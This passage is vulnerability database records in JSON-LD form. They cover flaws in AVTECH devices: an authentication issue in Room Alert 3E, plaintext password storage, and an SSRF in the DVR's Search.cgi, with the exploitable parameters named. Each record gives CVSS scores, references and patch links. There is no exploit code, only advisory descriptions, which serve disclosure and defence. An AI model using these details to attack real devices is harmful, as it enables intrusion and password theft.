"db": "CNVD",
"id": "CNVD-2019-26823"
}
]
},
"last_update_date": "2023-12-18T12:28:07.941000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Room Alert 3E Monitor",
"trust": 0.8,
"url": "https://avtech.com/products/environment_monitors/room_alert_3e.htm"
},
{
"title": "Patch for AVTECH Software Room Alert 3E Privilege Escalation Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/174439"
},
{
"title": "AVTECH Software Room Alert 3E Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=94490"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-26823"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006264"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-343"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-668",
"trust": 1.0
},
{
"problemtype": "CWE-287",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006264"
},
{
"db": "NVD",
"id": "CVE-2019-13379"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://jordonlovik.wordpress.com/2019/07/06/roomalert-by-avtech-critical-vulnerability-disclosure/"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13379"
},
{
"trust": 1.7,
"url": "https://www.youtube.com/watch?v=x1py7kmfkvg"
},
{
"trust": 1.7,
"url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2019-0010"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-13379"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/668.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-26823"
},
{
"db": "VULMON",
"id": "CVE-2019-13379"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006264"
},
{
"db": "NVD",
"id": "CVE-2019-13379"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-343"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-26823"
},
{
"db": "VULMON",
"id": "CVE-2019-13379"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006264"
},
{
"db": "NVD",
"id": "CVE-2019-13379"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-343"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-26823"
},
{
"date": "2019-07-07T00:00:00",
"db": "VULMON",
"id": "CVE-2019-13379"
},
{
"date": "2019-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-006264"
},
{
"date": "2019-07-07T16:15:10.227000",
"db": "NVD",
"id": "CVE-2019-13379"
},
{
"date": "2019-07-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-343"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-26823"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULMON",
"id": "CVE-2019-13379"
},
{
"date": "2019-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-006264"
},
{
"date": "2020-08-24T17:37:01.140000",
"db": "NVD",
"id": "CVE-2019-13379"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-343"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-343"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "AVTECH Room Alert 3E Authentication vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006264"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-343"
}
],
"trust": 0.6
}
}
VAR-201610-0725
Vulnerability from variot - Updated: 2022-05-04 10:19AVTECH, founded in 1996, is one of the world's leading manufacturers of CCTV. The main products are monitoring equipment, network cameras, network video recorders and so on. There is a plaintext storage password vulnerability in AVTECH devices. The attacker can use the vulnerability to obtain the user password through command injection or authentication bypass, which constitutes the risk of information leakage.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201610-0725",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dvr",
"scope": null,
"trust": 0.6,
"vendor": "avtech",
"version": null
},
{
"model": "nvr",
"scope": null,
"trust": 0.6,
"vendor": "avtech",
"version": null
},
{
"model": "ip camera",
"scope": null,
"trust": 0.6,
"vendor": "avtech",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-08707"
}
]
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2016-08707",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2016-08707",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-08707"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "AVTECH, founded in 1996, is one of the world\u0027s leading manufacturers of CCTV. The main products are monitoring equipment, network cameras, network video recorders and so on. There is a plaintext storage password vulnerability in AVTECH devices. The attacker can use the vulnerability to obtain the user password through command injection or authentication bypass, which constitutes the risk of information leakage.",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-08707"
}
],
"trust": 0.6
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2016-08707",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-08707"
}
]
},
"id": "VAR-201610-0725",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-08707"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-08707"
}
]
},
"last_update_date": "2022-05-04T10:19:38.750000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://seclists.org/bugtraq/2016/oct/26"
},
{
"trust": 0.6,
"url": "http://www.search-lab.hu/advisories/126-avtech-devices-multiple-vulnerabilities"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-08707"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2016-08707"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-10-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-08707"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-10-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-08707"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "AVTECH device has a plaintext storage password vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-08707"
}
],
"trust": 0.6
}
}
VAR-201610-0707
Vulnerability from variot - Updated: 2022-05-04 10:16AVTECH, founded in 1996, is one of the world's leading manufacturers of CCTV. The main products are monitoring equipment, network cameras, network video recorders and so on. There is a server side request forgery (SSRF) vulnerability in AVTECHDVR. Search.cgi provides search and access services for network cameras on the local network. Since an unauthenticated attacker can directly access the search interface, an attacker can exploit the vulnerability by modifying the IP, port, and queryb64str parameters to perform arbitrary HTTP requests on the DVR device.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201610-0707",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dvr",
"scope": null,
"trust": 0.6,
"vendor": "avtech",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-08736"
}
]
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2016-08736",
"impactScore": 4.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2016-08736",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-08736"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "AVTECH, founded in 1996, is one of the world\u0027s leading manufacturers of CCTV. The main products are monitoring equipment, network cameras, network video recorders and so on. There is a server side request forgery (SSRF) vulnerability in AVTECHDVR. Search.cgi provides search and access services for network cameras on the local network. Since an unauthenticated attacker can directly access the search interface, an attacker can exploit the vulnerability by modifying the IP, port, and queryb64str parameters to perform arbitrary HTTP requests on the DVR device.",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-08736"
}
],
"trust": 0.6
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2016-08736",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-08736"
}
]
},
"id": "VAR-201610-0707",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-08736"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-08736"
}
]
},
"last_update_date": "2022-05-04T10:16:22.747000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://seclists.org/bugtraq/2016/oct/26"
},
{
"trust": 0.6,
"url": "http://www.search-lab.hu/advisories/126-avtech-devices-multiple-vulnerabilities"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-08736"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2016-08736"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-10-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-08736"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-10-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-08736"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "\\302\\240Server-Side Request Forgery (SSRF) Vulnerability in AVTECH DVR",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-08736"
}
],
"trust": 0.6
}
}